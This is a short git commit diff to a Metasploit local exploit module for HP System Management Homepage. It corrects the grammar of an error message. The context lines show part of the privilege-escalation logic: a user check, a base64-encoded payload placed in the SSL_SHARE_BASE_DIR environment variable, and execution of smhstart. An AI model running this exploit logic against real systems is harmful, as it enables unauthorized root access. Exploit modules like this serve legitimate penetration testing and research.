english :) "must be"

bug/bundler_fix
agix 2013-04-03 13:47:57 +02:00
parent 60dfece55c
commit b947dc71e9
1 changed files with 1 additions and 1 deletions

View File

@ -84,7 +84,7 @@ class Metasploit4 < Msf::Exploit::Local
exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better
id=cmd_exec("id -un")
if id!="hpsmh"
fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must to be hpsmh to exploit this")
fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this")
end
cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")
cmd_exec("#{datastore['smhstartDir']}/smhstart")